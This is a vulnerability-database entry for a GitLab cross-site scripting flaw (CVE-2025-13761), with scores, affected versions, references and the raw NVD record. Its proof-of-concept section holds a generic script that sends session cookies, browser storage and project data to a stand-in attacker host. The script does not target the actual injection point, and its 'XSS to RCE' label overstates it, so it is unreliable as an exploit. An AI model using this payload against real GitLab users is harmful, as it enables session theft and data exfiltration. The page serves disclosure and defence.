Security Vulnerability Report
CVE-2025-13761 CVSS 8.0 HIGH

CVE-2025-13761

Published: 2026-01-09 10:15:45
Last Modified: 2026-01-22 17:26:38

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an unauthenticated user to execute arbitrary code in the context of an authenticated user's browser by convincing the legitimate user to visit a specially crafted webpage.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

The score above is the metric of type "Secondary" in the raw JSON data below. The same record also carries a metric of type "Primary" rated 9.6 CRITICAL with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H (attack complexity Low, availability impact High); the weakness is classified as CWE-79 (cross-site scripting).

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE 18.6 < 18.6.3
GitLab CE/EE 18.7 < 18.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-13761 PoC - GitLab XSS to RCE -->
<!-- This PoC demonstrates the XSS vulnerability that can lead to RCE in authenticated user's browser -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-13761 PoC</title>
</head>
<body>
  <h1>GitLab XSS -> Browser RCE PoC</h1>
  <script>
    // Attacker-controlled server to receive stolen credentials
    const ATTACKER_SERVER = "http://attacker.example.com/exfiltrate";

    // Malicious payload that exploits the XSS
    // The closing tag inside the template literal is written as <\/script> so the
    // HTML parser does not terminate the outer <script> element at that point.
    const xssPayload = `
      <script>
        // Steal GitLab session tokens
        fetch('${ATTACKER_SERVER}', {
          method: 'POST',
          mode: 'no-cors',
          body: JSON.stringify({
            cookies: document.cookie,
            localStorage: localStorage,
            sessionStorage: sessionStorage
          })
        });

        // If possible, execute commands via GitLab API
        // This requires understanding the specific XSS vector
        // The actual exploitation depends on where the XSS is triggered
        // Example: Make API calls as the authenticated user
        fetch('/api/v4/projects?membership=true')
          .then(r => r.json())
          .then(data => {
            // Exfiltrate project data
            fetch('${ATTACKER_SERVER}', {
              method: 'POST',
              body: JSON.stringify({projects: data})
            });
          });
      <\/script>
    `;

    // Social engineering component - redirect to vulnerable endpoint
    function triggerExploit() {
      // The actual XSS would be triggered when GitLab renders unsanitized input
      // This could be via:
      // 1. Issue descriptions
      // 2. Merge request comments
      // 3. Wiki pages
      // 4. Snippet content
      // 5. User profile fields

      // For demonstration, this simulates the attack flow
      console.log('XSS Payload:', xssPayload);
      console.log('In a real attack, this would be injected into a GitLab field');
      console.log('When a victim views the page, the script executes in their browser context');
    }

    // Auto-trigger on page load
    window.onload = triggerExploit;
  </script>

  <p>Note: This is a demonstration of the attack concept. The actual exploitation requires:</p>
  <ul>
    <li>Identifying the specific injection point in GitLab</li>
    <li>Crafting a payload that bypasses GitLab's filters</li>
    <li>Social engineering to get the victim to visit the page</li>
    <li>An attacker-controlled server to receive exfiltrated data</li>
  </ul>
</body>
</html>
```

References

https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/582237 (Broken Link)
https://hackerone.com/reports/3441368 (Permissions Required)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13761",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T10:15:45.280",
    "lastModified": "2026-01-22T17:26:37.803",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an unauthenticated user to execute arbitrary code in the context of an authenticated user's browser by convincing the legitimate user to visit a specially crafted webpage."
      },
      {
        "lang": "es",
        "value": "GitLab ha remediado un problema en GitLab CE/EE que afectaba a todas las versiones desde la 18.6 antes de la 18.6.3, y la 18.7 antes de la 18.7.1 que podría haber permitido a un usuario no autenticado ejecutar código arbitrario en el contexto del navegador de un usuario autenticado al convencer al usuario legítimo de visitar una página web especialmente diseñada."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*",
                "versionStartIncluding": "18.6.0",
                "versionEndExcluding": "18.6.3",
                "matchCriteriaId": "2B9B2E1D-016E-45CF-80CD-7CC77A5B5576"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.6.0",
                "versionEndExcluding": "18.6.3",
                "matchCriteriaId": "75013646-70F2-467E-B79E-9301338AB853"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:community:*:*:*",
                "matchCriteriaId": "D5EB2CAA-6B1C-4780-B872-82947A098FED"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:*",
                "matchCriteriaId": "9B955F55-086B-4EDF-A9E6-5B9E68600494"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/",
        "source": "[email protected]",
        "tags": ["Release Notes", "Vendor Advisory"]
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/582237",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://hackerone.com/reports/3441368",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}
```